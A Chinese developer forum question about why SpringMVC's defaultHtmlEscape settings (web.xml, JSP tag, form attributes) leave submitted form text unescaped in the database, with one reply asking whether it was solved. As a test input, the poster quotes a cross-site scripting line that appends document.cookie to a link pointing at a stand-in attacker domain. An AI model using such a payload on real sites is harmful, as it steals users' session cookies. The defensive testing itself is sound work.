SpringMVC: HtmlEscape 设置没起作用怎么回事?
项目用的是 SpringMVC+jsp
想要对提交表格的内容进行字符转义防止 XSS 攻击
根据 http://www.codeweblog.com/spr...
做处理,下面三条都做了
1)web.xml 中添加
<context-param> <param-name>defaultHtmlEscape</param-name> <param-value>true</param-value> </context-param>2)在包含 form 的 jsp 页面中添加
<spring:htmlEscape defaultHtmlEscape="true" />
3 )直接在 form 中的元素中添加
<form:input path="someFormField" htmlEscape="true" />或<form:form htmlEscape="true">然后在表格上添加
<script>document.getElementById('attacker').href='http://www.attacker_741.com/r...'+document.cookie;</script>
发现存进数据库的没有转移,依然是原文
怎么回事啊?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(1)
现在解决了吗?